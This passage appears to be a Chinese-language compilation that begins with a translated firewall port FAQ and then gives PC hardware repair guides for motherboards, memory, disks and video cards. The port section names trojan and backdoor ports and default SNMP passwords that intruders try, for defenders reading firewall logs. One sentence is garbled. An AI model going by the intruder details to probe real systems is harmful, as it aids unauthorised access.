    大量针对这一端口始于1999，后来逐渐变少。2000年又有回升。一些VBS（IE5 VisualBasic Scripting）开始将它们自己拷贝到这个端口，试图在这个端口繁殖。
    143 IMAP 和上面POP3的安全问题一样，许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住：一种Linux蠕虫（admw0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后，这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。
    这一端口还被用于IMAP2，但并不流行。
    已有一些报道发现有些0到143端口的攻击源于脚本。
    161 SNMP(UDP) 入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中，通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。
    SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect remote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名，你会看见这种包在子网内广播（cable modem, DSL）查询sysName和其它信息。
    162 SNMP trap 可能是由于错误配置
    177 xdmcp 许多Hacker通过它访问X-Windows控制台，它同时需要打开6000端口。
    513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供了很有趣的信息。
    553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN，你将会看到这个端口的广播。CORBA是一种面向对象的RPC（remote procedure call）系统。Hacker会利用这些信息进入系统。
    600 Pcserver backdoor 请查看1524端口
    一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.
    635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的，但基于TCP的mountd有所增加（mountd同时运行于两个端口）。记住，mountd可运行于任何端口（到底在哪个端口，需要在端口111做portmap查询），只是Linux默认为635端口，就象NFS通常运行于2049端口。
    1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络，它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点，你可以重启机器，打开Telnet，再打开一个窗口运行“natstat -a”，你将会看到Telnet被分配1024端口。请求的程序越多，动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍，当你浏览Web页时用“netstat”查看，每个Web页需要一个新端口。
  ?ersion 0.4.1, June 20, 2000
    http://www.robertgraham.com/pubs/firewall-seen.html
    Copyright 1998-2000 by Robert Graham (mailto:firewall-seen1@robertgraham.com.
    All rights reserved. This document may only be reproduced (whole or
in part) for non-commercial purposes. All reproductions must
contain this copyright notice and must not be altered, except by
permission of the author.
    1025 参见1024
    1026 参见1024
    1080 SOCKS
    这一协议以管道方式穿过防火墙，允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置，它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机，从而掩饰他们对你的直接攻击。WinGate是一种常见的Windows个人防火墙，常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。
    1114 SQL
    系统本身很少扫描这个端口，但常常是sscan脚本的一部分。
    1243 Sub-7木马（TCP）
    参见Subseven部分。
    1524 ingreslock后门
    许多攻击脚本将安装一个后门Sh*ll 于这个端口（尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本，如statd, ttdbserver和cmsd）。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图，很可能是上述原因。你可以试试Telnet到你的机器上的这个端口，看看它是否会给你一个Sh*ll 。连接到600/pcserver也存在这个问题。
    2049 NFS
    NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口，但是大部分情况是安装后NFS 杏谡飧龆丝冢?acker/Cracker因而可以闭开portmapper直接测试这个端口。
    3128 squid
    这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看到搜索其它代理服务器的端口：8000/8001/8080/8888。扫描这一端口的另一原因是：用户正在进入聊天室。其它用户（或服务器本身）Q9750406也会检验这个端口以确定用户的机器是否支持代理。请查看5.3节。
    5632 pcAnywere
    你会看到很多这个端口的扫描，这依赖于你所在的位置。当用户打开pcAnywere时，它会自动扫描局域网C类网以寻找可能得代理（译者：指agent而不是proxy）。Hacker/cracker也会寻找开放这种服务的机器，所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。
    6776 Sub-7 artifact
    这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器，而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时，他们将会看到持续的，在这个端口的连接企图。（译者：即看到防火墙报告这一端口的连接企图时，并不表示你已被Sub-7控制。）
    6970 RealAudio
    RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置的。
    13223 PowWow
    PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户，从另一个聊天者手中“继承”了IP地址这种情况就会发生：好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四个字节。
    17027 Conducent
    这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软件。Conducent "adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验：阻断这一外向连接不会有任何问题，但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载：
机器会不断试图解析DNS名─ads.conducent.com，即IP地址216.33.210.40 ；216.33.199.77 ；216.33.199.80 ；216.33.199.81；216.33.210.41。（译者：不知NetAnts使用的Radiate是否也有这种现象）
    27374 Sub-7木马(TCP)
    参见Subseven部分。
    30100 NetSphere木马(TCP)
    通常这一端口的扫描是为了寻找中了NetSphere木马。
    31337 Back Orifice “elite”
    Hacker中31337读做“elite”/ei’li:t/（译者：法语，译为中坚力量，精华。即3=E, 1=L, 7=T）。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少，其它的木马程序越来越流行。
    31789 Hack-a-tack
    这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马（RAT, Remote Access Trojan）。这种木马包含内置的31790端口扫描器，因此任何31789端口到317890端口的连接意味着已经有这种入侵。（31789端口是控制连接，317890端口是文件传输连接）
    32770~32900 RPC服务
    Sun Solaris的RPC服务在这一范围内。详细的说：早期版本的Solaris（2.5.1之前）将portmapper置于这一范围内，即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围内的端口不是为了寻找portmapper，就是为了寻找可被攻击的已知的RPC服务。
    33434~33600 traceroute
    如果你看到这一端口范围内的UDP数据包（且只在此范围之内）则可能是由于traceroute。参见traceroute部分。
    41508 Inoculan
    早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。参见
    http://www.circlemud.org/~jelson/software/udpsend.html
    http://www.ccd.bnl.gov/nss/tips/inoculan/index.html
(二） 下面的这些源端口意味着什么？
    端口1~1024是保留端口，所以它们几乎不会是源端口。但有一些例外，例如来自NAT机器的连接。参见1.9。
    常看见紧接着1024的端口，它们是系统分配给那些并不在乎使用哪个端口连接的应用程序的“动态端口”。
Server Client 服务 描述
    1-5/tcp 动态 FTP 1-5端口意味着sscan脚本
    20/tcp 动态 FTP FTP服务器传送文件的端口
    53 动态 FTP DNS从这个端口发送UDP回应。你也可能看见源/目标端口的TCP连接。
    123 动态 S/NTP 简单网络时间协议（S/NTP）服务器运行的端口。它们也会发送到这个端口的广播。
    27910~27961/udp 动态 Quake Quake或Quake引擎驱动的游戏在这一端口运行其服务器。因此来自这一端口范围的UDP包或发送至这一端口范围的UDP包通常是游戏。
    61000以上 动态 FTP 61000以上的端口可能来自Linux NAT服务器（IP Masquerade）
Anndoo


关于维修主板的几点参考

《一键清理系统垃圾》

关于维修主板的几点参考

    随着主板的集成度越来越高，维修主板的难度越来越高，往往需要维修人员具有丰富的专业知识并借助专门的数字检测设备才能解决问题。“主板损坏就换主板”是一般电脑使用者解决主板故障的常用方法。现在，一块主板价格在600至1000元之间，如果出一点小问题就弃之不用，实在太可惜。其实，有些故障不需要专门检测设备，也不需要高深的计算机专业知识就可以修复。下面，我把在维修工作中遇到的一些主板维修实例列举如下，供电脑DIYer们参考。
#1　　一、CMOS参数丢失
    开机后提示“CMOS Battery State Low”，有时可以启动，使用一段时间后死机，这种现象大多是CMOS供电不足引起的。对于不同的CMOS供电方式，采取不同的措施：1.焊接式电池：用电烙铁重新焊上一颗新电池即可。2.钮扣式电池：直接更换。3.芯片式：更换此芯片最好采用相同型号芯片替换。如果更换电池后时间不长又出现同样现象的话，很可能是主板漏电，可检查主板上的二极管或电容是否损坏，也可以跳线使用外接电池。
    二、主板上键盘接口不能使用
    接上一好键盘，开机自检时出现提示“Keyboard Interface Error”后死机，拔下键盘，重新插入后又能正常启动系统，使用一段时间后键盘无反应，这种现象主要是多次拔插键盘引起主板键盘接口松动，拆下主板用电烙铁重新焊接好即可；也可能是带电拔插键盘，引起主板上一个保险电阻断了（在主板上标记为Fn的东西），换上一个1欧姆/0.5瓦的电阻即可。
    三、集成在主板上的显示适配器故障
    一般来说，计算机开机响几声，大多数是主板内存没插好或显示适配器故障。有一长城微机，开机响8声，确定是显示器适配器故障。打开机箱发现显示适配器集成在主板上，又无主板说明书。针对这种情况，要仔细查看主板上的跳线标示，屏蔽掉主板上集成的显示设备，然后在扩展槽上插上好的显示卡后故障排除（有些主板可能是通过CMOS设置来允许或禁止该功能）。
    四、集成在主板上的打印机并口损坏
    品牌机及多数486以上的微机打印机并口，大多集成在主板上，用机的时候带电拔插打印机信号电缆线最容易引起主板上并口损坏。遇到类似情况，可以查看主板说明书，通过“禁止或允许主板上并口功能”相关跳线，设置“屏蔽”主板上并口功能。另一种是通过CMOS设置来屏蔽，然后在ISA扩展槽中加上一块多功能卡即可。
    五、主板上软、硬盘控制器损坏
    从486开始，大多数主板均集成软、硬盘控制器。如果软盘控制器损坏，也可以仿照上面的方法加一块多功能卡即可搞定（相应更改主板上跳线或CMOS设置）；如果硬盘控制器坏，针对不同情况处理：如果所接硬盘小于528MB，可以加多功能卡；如果不是的话，需要更新主板BIOS或利用相关的软件了。
    六、主板上Cache损坏
    主板上Cache损坏，表现为运行软件死机或根本无法装软件。可以在CMOS设置中将“External Cache”项设为“Disable”后故障排除。
    七、主板上开关电源损坏
    主板上的电源多为开关电源，所用的功率管为分离器件，如有损坏，只要更换功率管、电容等即可。


换芯法”医主板

《一键清理系统垃圾》

换芯法”医主板

    我校微机室有一台奔腾兼容机，该机主板集成了显卡。一天，开机后出现这样的异常现象：显示器无显示，同时主机箱内的扬声器在发出了“嘀、嘀”声及系统自检声后，显示器仍然不显示。
        根据这种现象，可以判定CPU无问题，否则，就不会有自检的声音。问题若出在显卡上，通常是显卡松动所致。然而，该机的显卡集成在主板上，无松动可言，难道是主板上显卡接口的某个焊接点虚焊或脱焊了？于是，打开机箱取出主板，仔细检查、测量也没有发现虚焊处。
        怎么办？对于这类故障，我以前都是采用外加显卡来排除的，即在主板上的一个扩展槽内另外插上一块正常的显卡。但是，这样做既浪费了主板上一条宝贵的插槽，又浪费了主板上已集成的显卡功能，同时还得另外再用上一块正常的显卡，实属劳民伤财，不足取。于是，再次细心地查看了主板上的每组部件，同时翻阅了该主板的说明书，发现该主板上有两块芯片是可以直接插拔的。全部拔下来后，发现它们的插座底面上一个标有“Keyboard BIOS”字样，另一个标有“BIOS”字样。BIOS即Basic Input/Output System（基本输入输出系统）的缩写，而键盘和显卡属于基本输入输出系统的设备。再根据所标示的文字提示，我突来灵感，断定插在标有“BIOS”插座上的芯片一定与主板上集成的显卡功能有主要关系，于是，果断地换上一块正常的相同芯片，待其它有关安装完毕后，开机检验，微机竟显示正常了，故障被排除！这样既恢复了主板上集成的显卡功能，又避免了主板上外加显卡之浪费，一箭双雕，何乐而不为呢？
        小结：通过这一主板维修实例，使我认识到：如果微机主板上集成的声卡或显卡功能出了问题，千万不要急于给主板外加一块相应的功能卡，更不要无奈地抛弃，而应先查找主板上与之相关的集成芯片，然后加以更换（不管它是插拔还是焊接的），或许能够挽救一块主板。这么经济有效的方法，何不一试？我是极力推荐的，因为我们随后又用这种“换芯法”把一台品牌机的主板修好了。虽然，这次更换芯片用到了焊接，稍有点麻烦，但至少对我来说颇有新意，可以说是另辟蹊径地解决了这类问题（我以前都是通过外加相应的功能卡来修复的）。


计算机硬件维护知识

《一键清理系统垃圾》

计算机硬件维护知识

一、　 CPU故障的分析与维修
1、　　　　 锁频
我想超频，但改CPU倍频系数后，电脑开机时显示的频率没有改变。
方法：修改外频。
步骤：关机后设置外频跳线。
说明：这是一个锁频的CPU，倍频系数被锁住了，所以只能修改外频。如果原来使用的外频是66MHz，现在可以使用75MHz甚至83MHz等更高外频，具体由您的主板外频跳线决定。

2、　　　　 不能稳定地支持100MHz频率
使用华硕PII B 100MHz主板，散装PII/300 CPU，名牌64M 100MHz的内存，宝利得名牌机箱和电源，在接上电源线后，不按开机按钮电脑就自动启动了，屏幕一片漆黑。
方法：更换内存、CPU、主板。
说明：因为使用了不少名牌配件，就怀疑机箱按钮始终处于开启状态。检查结果证明机箱开关正常。换机箱和电源还是出现上述故障。从此开始怀疑这华硕主板有问题。因为，使用同样的配置组装了两套电脑，都是同样现象。换主板故障依旧。遂逐个更换，当更换成原装（盒装）的PII 300 CPU后，系统运行正常。事后把散装的PII 300 CPU安装在66MHz的华硕主板上，运行稳定，内存自检。

3、　　　　 生锈
一片半导体致冷片，安装在散热片与CPU之间。同时为了保证导热良好，致冷片的两面都涂上了硅胶。使用两个月后，开机后显示器黑屏。
方法：除锈。
过程：开始以为显卡有问题，因为从显示器的指示灯来判断是无信号输出，但换一块好显卡后一切照旧。又怀疑是显示器有故障，换了一台显示器后情况照旧。难道是CPU有毛病?借来朋友的CPU一试，正常了!问题找到了，可总想不通，没有超频使用也会烧CPU?看着可怜的CPU，总不相信它就这么牺牲了。看来看去，忽然发现原本金光闪闪的金手指不是发黑了就是长出了绿斑——生锈了！看来还有救。赶紧找了一块橡皮，仔仔细细地把每一个针脚都擦一遍，直到恢复以前的模样。再装入机内，开机，一切OK!
说明：致冷片的表面温度过低结露，导致CPU长期工作在潮湿的环境中，日积月累，终于产生太多锈斑，造成接触不良，从而引发这次故障。

二、　 常见内存故障及处理方法
1、存检测时间长
别人的电脑在开机时检测一遍，但我的电脑检测3遍，我的128M 内存检测时间太长了。
方法：设置Quick Power On Self Test 和Esc 键。
步骤：开机时，按Del 键进入Setup ；选择BIOS Features Setup ，回车；使用PgDn 键把“Quick Power On SelfTest”设置为“Enabled”；使用F10键退出(回答Y)；开机自检内存时，按Esc 键跳过自检。
说明：随着内存价格急剧下降，电脑基本配置内存容量的增加，开机内存自检时间越来越长，即使使用快速检测，把三遍检测改成一遍检测，时间也不短，因此需要使用Esc 键直接跳过检测。以后Setup 一定会有完全不检测内存的开关。

2、不识别128MB 以上内存?
由于内存条便宜了，我就安装了很多内存条，结果发现136MB内存只检测到128M 内存，其余的内存哪里去了？
方法：主板限制。
步骤：略。
说明：主板有个指标，就是最大内存容量支持。一般的限制是256MB，高的512MB。而128MB是比较低档的主板的内存容量限制。只能更换主板。因此，与其增加内存条不如更换主板和CPU。

3、内存数量与实际不符
整条内存丢失
开机后内存数量成为8M 了，原来我的电脑开机时显示的是16M。这根本无法解释，我使用的72线内存条。CPU 是586、64位的，而72线内存条是32位的，必须两条两条的插，可是我插的两条8M 内存条怎么会变成8M 呢？如果是一条接触不良，电脑应该不能工作呀？
方法：更换内存条?
步骤：略。
说明：因为内存条与主板存在兼容性，因此有可能出现这样的问题。这时是不能根据两条32位内存条同时有效的理论解释的。

4、内存部分减少
开机后，在Win 95中发现内存减少了1MB，本来应该是16MB的。
方法：区分集成显示卡主板共享存储器、BIOS 保留15-16M 的空间给扩展卡、Smartdrv 占用问题。
步骤：如果您使用的是集成在主板上的显示卡，而显示卡与主板共享内存，就会发现这样的情况。开机后，内存自检时显示的内容与正常主板显示的内容不一样。正常主板只显示一个内存容量，而集成声卡主板会显示“15360MB+1024KBShared Memory[a1]”，表示16M 有1M 用于显示缓存了。
开机，按Del 键进入BIOS 设置，把“ChipSet Fea?tures Setup”中的“Memory Hole At 15M-16M”设置成“Disabled”。
如果设置成“Disabled”后，系统或某个扩展卡不能稳定地使用，请恢复上面的设置为“Enabled”。
如果上面的选项是本来就是“Disabled”，就接着检查Smartdrv 占用。
检查Smartdrv 占用：开机后，进入MS-DOS 兼容方式，使用Edit C：\Autoexec .bat 把发现的Smartdrv 命令删除掉或在前面加注释前缀Rem。

5、常规内存减少1K?
我在使用电脑的过程中无意发现，常规内存只有639K，是否存在故障？方法：检查病毒、看CMOS 参数。
步骤：把杀毒软盘插入软驱；开机；在出现A>后，输入KV300；出现提示后，输入C和回车；杀毒工作就开始了。
说明：早期的名牌电脑，如COMPAQ 等名牌电脑本身就少1K 甚至几K 内存，是正常的。一些386/486电脑上BIOSSetup 中在BIOSFeatures Setup 中有CMOS参数是否占有DOS1K 的选项，也是可以让内存减少1K 的，选择另外的选项就可以解决这个问题。

三、　 主板故障诊断
主板故障的分类
1、 根据对微机系统的影响可分为非致命性故障和致命性故障非致命性故障也发生在系统上电自检期间，一般给出错误信息；致命性故障发生在系统上电自检期间，一般导致系统死机。
2、 根据影响范围不同可分为局部性故障和全局性故障 局部性故障指系统某一个或几个功能运行不正常，如主板上打印控制芯片损坏，仅造成联机打印不正常，并不影响其它功能；全局性故障往往影响整个系统的正常运行，使其丧失全部功能，例如时钟发生器损坏将使整个系统瘫痪。
3、 根据故障现象是否固定可分为稳定性故障和不稳定性故障
4、 稳定性故障是由于元器件功能失效、电路断路、短路引起，其故障现象稳定重复出现，而不稳定性故障往往是由于接触不良、元器件性能变差，使芯片逻辑功能处于时而正常、时而不正常的临界状态而引起。如由于I/O插槽变形，造成显示卡与该插槽接触不良，使显示呈变化不定的错误状态。
5、 根据影响程度不同可分为独立性故障和相关性故障
6、 独立性故障指完成单一功能的芯片损坏；相关性故障指一个故障与另外一些故障相关联，其故障现象为多方面功能不正常，而其故障实质为控制诸功能的共同部分出现故障引起（例如软、硬盘子系统工作均不正常，而软、硬盘控制卡上其功能控制较为分离，故障往往在主板上的外设数据传输控制即DMA控制电路）。
7、 根据故障产生源可分为电源故障、总线故障、元件故障等
8、 电源故障包括主板上＋12V、＋5V及＋3.3V电源和Power Good信号故障；总线故障包括总线本身故障和总线控制权产生的故障；元件故障则包括电阻、电容、集成电路芯片及其它元部件的故障。

四、　 引起主板故障的主要原因
1．　　　　 人为故障：带电插拨I/O卡，以及在装板卡及插头时用力不当造成对接口、芯片等的损害
2．　　　　 环境不良：静电常造成主板上芯片（特别是CMOS芯片）被击穿。另外，主板遇到电源损坏或电网电压瞬间产生的尖峰脉冲时，往往会损坏系统板供电插头附近的芯片。如果主板上布满了灰尘，也会造成信号短路等。
3．　　　　 器件质量问题：由于芯片和其它器件质量不良导致的损坏。

五、　 主板故障检查维修的常用方法
主板故障往往表现为系统启动失败、屏幕无显示等难以直观判断的故障现象。下面列举的维修方法各有优势和局限性，往往结合使用。
1. 清洁法
  可用毛刷轻轻刷去主板上的灰尘，另外，主板上一些插卡、芯片采用插脚形式，常会因为引脚氧化而接触不良。可用橡皮擦去表面氧化层，重新插接。
2．观察法
  反复查看待修的板子，看各插头、插座是否歪斜，电阻、电容引脚是否相碰，表面是否烧焦，芯片表面是否开裂，主板上的铜箔是否烧断。还要查看是否有异物掉进主板的元器件之间。遇到有疑问的地方，可以借助万用表量一下。触摸一些芯片的表面，如果异常发烫，可换一块芯片试试。
3.电阻、电压测量法
  为防止出现意外，在加电之前应测量一下主板上电源＋5V与地（GND）之间的电阻值。最简捷的方法是测芯片的电源引脚与地之间的电阻。未插入电源插头时，该电阻一般应为300Ω，最低也不应低于100Ω。再测一下反向电阻值，略有差异，但不能相差过大。若正反向阻值很小或接近导通，就说明有短路发生，应检查短的原因。产生这类现象的原因有以下几种：
（1） 系统板上有被击穿的芯片。一般说此类故障较难排除。例如TTL芯片（LS系列）的＋5V连在一起，可吸去＋5V引脚上的焊锡，使其悬浮，逐个测量，从而找出故障片子。如果采用割线的方法，势必会影响主板的寿命。
（2） 板子上有损坏的电阻电容。
（3） 板子上存有导电杂物。
  当排除短路故障后，插上所有的I/O卡，测量＋5V，＋12V与地是否短路。特别是＋12V与周围信号是否相碰。当手头上有一块好的同样型号的主板时，也可以用测量电阻值的方法测板上的疑点，通过对比，可以较快地发现芯片故障所在。
  当上述步骤均未见效时，可以将电源插上加电测量。一般测电源的＋5V和＋12V。当发现某一电压值偏离标准太远时，可以通过分隔法或割断某些引线或拔下某些芯片再测电压。当割断某条引线或拔下某块芯片时，若电压变为正常，则这条引线引出的元器件或拔下来的芯片就是故障所在。
4．拔插交换法
  主机系统产生故障的原因很多，例如主板自身故障或I/O总线上的各种插卡故障均可导致系统运行不正常。采用拔插维修法是确定故障在主板或I/O设备的简捷方法。该方法就是关机将插件板逐块拔出，每拔出一块板就开机观察机器运行状态，一旦拔出某块后主板运行正常，那么故障原因就是该插件板故障或相应I/O总线插槽及负载电路故障。若拔出所有插件板后系统启动仍不正常，则故障很可能就在主板上。采用交换法实质上就是将同型号插件板，总线方式一致、功能相同的插件板或同型号芯片相互芯片相互交换，根据故障现象的变化情况判断故障所在。此法多用于易拔插的维修环境，例如内存自检出错，可交换相同的内存芯片或内存条来确定故障原因。
5．静态、动态测量分析法
（1） 静态测量法：让主板暂停在某一特写状态下，由电路逻辑原理或芯片输出与输入之间的逻辑关系，用万用表或逻辑笔测量相关点电平来分析判断故障原因。
（2） 动态测量分析法：编制专用论断程序或人为设置正常条件，在机器运行过程中用示波器测量观察有关组件的波形，并与正常的波形进行比较，判断故障部位。
6．先简单后复杂并结合组成原理的判断法
  随着大规模集成电路的广泛应用，主板上的控制逻辑集成度越来越高，其逻辑正确性越来越难以通过测量来判断。可采用先判断逻辑关系简单的芯片及阻容元件，后将故障集中在逻辑关系难以判断的大规模集成电路芯片。
7．软件诊断法
  通过随机诊断程序、专用维修诊断卡及根据各种技术参数（如接口地址），自编专用诊断程序来辅助硬件维修可达到事半功倍之效。程序测试法的原理就是用软件发送数据、命令，通过读线路状态及某个芯片（如寄存器）状态来识别故障部位。此法往往用于检查各种接口电路故障及具有地址参数的各种电路。但此法应用的前提是CPU及基总线运行正常，能够运行有关诊断软件，能够运行安装于I/O总线插槽上的诊断卡等。编写的诊断程序要严格、全面有针对性，能够让某些关键部位出现有规律的信号，能够对偶发故障进行反复测试及能显示记录出错情况

六、　 硬盘故障巧维修
1.　 为什么BIOS检测不到硬盘？
1、 如果BIOS无法自动检测到硬盘，通常有下面四种原因：
2、 硬盘未正确安装。这时候我们首先要做的是去检查硬盘的数据线及电源线是否正确安装？一般情况下可能是虽然已插入相应位置，但却未正确到位所致，这时候当然就检测不到硬盘了。
3、 Jumper（跳线）未正确设置。如果你的电脑安装了双硬盘，那么需要将其中的一个设置为主硬盘（Master），另一个设置为从硬盘（Slave），如果两个都设置为主硬盘或两个都设置为从硬盘的话，你又将两个硬盘用一根数据线连接到主板的IDE插槽，这时BIOS就无法正确检测到你的硬盘信息了。最好是分别用两根数据线连接到主板的两个IDE插槽中，这样还可以保证即使你的硬盘接口速率不一，也可以稳定的工作。
4、 硬盘与CD－ROM接在同一个IDE接口上。一般情况下，只要我们正确设置的话，将硬盘和CD－ROM接在同一个IDE接口上都会相安无事，但可能有些新式CD－ROM会与老式硬盘发生冲突，因此还是分开接比较保险。
5、 硬盘或IDE接口发生物理损坏。如果硬盘已经正确安装，而且跳线正确设置，CD－ROM也没有与硬盘接到同一个IDE接口上，但BIOS仍然检测不到硬盘，那么最大的可能就是IDE接口可能发生故障，你可以试着换一个IDE接口试试，假如仍不行，那么恐怕你的硬盘有问题了，必须接到另一台电脑上试一试，如果能正确识别，那么说明IDE接口存在故障，假如仍然识别不到，表示硬盘有问题；也可以用另外一个新硬盘或能正常工作的硬盘安装到你的电脑上，如果BIOS也识别不到，表示电脑的IDE接口有故障，如果可以识别，说明原来的硬盘确实有故障。

2.　 了解常见的硬盘故障信息提示
1、　 我们可以通过如下的表格了解常见的硬盘故障信息，这样在判断时可就心中有底了！
2、　 故障信息提示 具体含义 产生原因 解决办法
3、　 No partition bootable 没有分区表 硬盘未分区或分区表信息丢失（可能是病毒引起的）。 先杀毒，然后用ＤＯＳ启动后执行ＦＤＩＳＫ命令重新分区。
4、　 NO ROM BASIC 或 PRESS KEY TOREBOOT 找不到引导系统 未设置活动分区（set active partition）,不排除病毒原因 先杀毒，然后重新运行ＦＤＩＳＫ并设置活动分区。
5、　 Missing operation system 找不到引导系统 硬盘未格式化或丢失三大文件系统 Format c:/s 或　sys c:
6、　 Non-system disk or disk 非系统盘或者磁盘错误 使用非系统盘引导 取出软盘用硬盘引导或插入系统盘。
7、　 Bad or missing command interpreter 或 command.com is bad command.com文件读出错或丢失 command.com文件因误操作而被删除，或是病毒的破坏。 将command.com文件拷贝到硬盘上，或者干脆使用 SYS C:命令传输文件。也可以使用NDD等工具软件来修复。
8、　 Cannot load Command.com,system halted 装载失败 command.com文件被破坏或者command.com文件的版本与引导系统不兼容。 重新拷贝该文件到硬盘上，但有时需要杀毒。
9、　 DISK BOOT FAILURE 硬盘引导失败 产生的原因很多，可能是硬盘发生问题 先将硬盘拿到其他机器上试一试，假如一切正常，说明主板IDE接口有故障，假如仍然无法引导，说明硬盘有故障。

3.　 硬盘既无法启动，又没有任何错误信息
  遇到这种情况是最恼人的事情，因为判断故障比较困难。我们一般是用替换法，先用DOS系统盘从“A：”启动，出现“A：\>”后键入“C:\>”切换到“C：”盘，假如出现“Invalid drive specification”错误信息，说明是硬盘的MBR（主引导记录）故障；DIR后出现“Invalid media type reading drive C:”错误信息则说明是硬盘的DBR（DOS引导记录）故障；如果使用“DIR”命令后可以正确显示文件名称、大小、日期等信息，表示文件正常，请立即将硬盘中的文件进行转移，然后重新分区、格式化吧。

4.　 安装双硬盘后盘符交叉的问题
  安装双硬盘的朋友经常会遇到进入Windows 98后发生盘符交叉的问题，尤其是当两个硬盘都建有主引导分区时，此时你就会发现Windows 98是将两个硬盘上的主引导分区放在一起，而将其他分区按顺序排序，这就造成了盘符错位的现象，造成我们操作的不便。这是因为Windows 98并不正式支持双硬盘（Windows 2000可以很好的支持，建议朋友们升级）。解决这个问题最简便的办法是进入BIOS设置程序，将第二硬盘设置为“NONE”，再次进入Windows 98，你会发现盘符错位的现象已经没有了，我们可以顺利访问两个硬盘，使用其中的资源，当然笔者认为最好的办法还是使用Windows 2000系统，让它来自动管理双硬盘，即省心又安全。

  总的来说，硬盘一般不会轻易出现什么故障，但一旦出现就是不可估量的损失。因此希望朋友们还是平时注意系统的备份和维护，同时加强病毒监测，最大限度的保证硬盘工作的稳定性。

七、　 显卡常见故障
1、见故障一：开机无显示
  此类故障一般是因为显卡与主板接触不良或主板插槽有问题造成。对于一些集成显卡的主板，如果显存共用主内存，则需注意内存条的位置，一般在第一个内存条插槽上应插有内存条。由于显卡原因造成的开机无显示故障，开机后一般会发出一长两短的蜂鸣声（对于AWARD BIOS显卡而言）。

2、常见故障二：显示花屏，看不清字迹
  此类故障一般是由于显示器或显卡不支持高分辨率而造成的。花屏时可切换启动模式到安全模式，然后再在Windows 98下进入显示设置，在16色状态下点选“应用”、“确定”按钮。重新启动，在Windows 98系统正常模式下删掉显卡驱动程序，重新启动计算机即可。也可不进入安全模式，在纯DOS环境下，编辑SYSTEM.INI文件，将display.drv=pnpdrver改为display.drv=vga.drv后，存盘退出，再在Windows里更新驱动程序。
3、常见故障三：颜色显示不正常，此类故障一般有以下原因：
l　　　 显示卡与显示器信号线接触不良
l　　　 显示器自身故障
l　　　 在某些软件里运行时颜色不正常，一般常见于老式机，在BIOS里有一项校验颜色的选项，将其开启即可
l　　　 显卡损坏；
l　　　 显示器被磁化，此类现象一般是由于与有磁性能的物体过分接近所致，磁化后还可能会引起显示画面出现偏转的现象。

4、常见故障四：死机
  出现此类故障一般多见于主板与显卡的不兼容或主板与显卡接触不良；显卡与其它扩展卡不兼容也会造成死机。

5、常见故障五：屏幕出现异常杂点或图案
  此类故障一般是由于显卡的显存出现问题或显卡与主板接触不良造成。需清洁显卡金手指部位或更换显卡。

6、常见故障六：显卡驱动程序丢失
  显卡驱动程序载入，运行一段时间后驱动程序自动丢失，此类故障一般是由于显卡质量不佳或显卡与主板不兼容，使得显卡温度太高，从而导致系统运行不稳定或出现死机，此时只有更换显卡。
  此外，还有一类特殊情况，以前能载入显卡驱动程序，但在显卡驱动程序载入后，进入Windows时出现死机。可更换其它型号的显卡在载入其驱动程序后，插入旧显卡予以解决。如若还不能解决此类故障，则说明注册表故障，对注册表进行恢复或重新安装操作系统即可。
八、　 网卡常见故障
  很多时候，电脑无法连接到网络上是由于网卡的设置不对。下面就来讲述如何查找网卡的配置问题以解决连接故障。
1、细检查网卡
l　　　 在解决网卡的配置问题之前，必须对网卡有所了解。目前市场上有几种类型的网卡，每一种的配置技巧都不同。
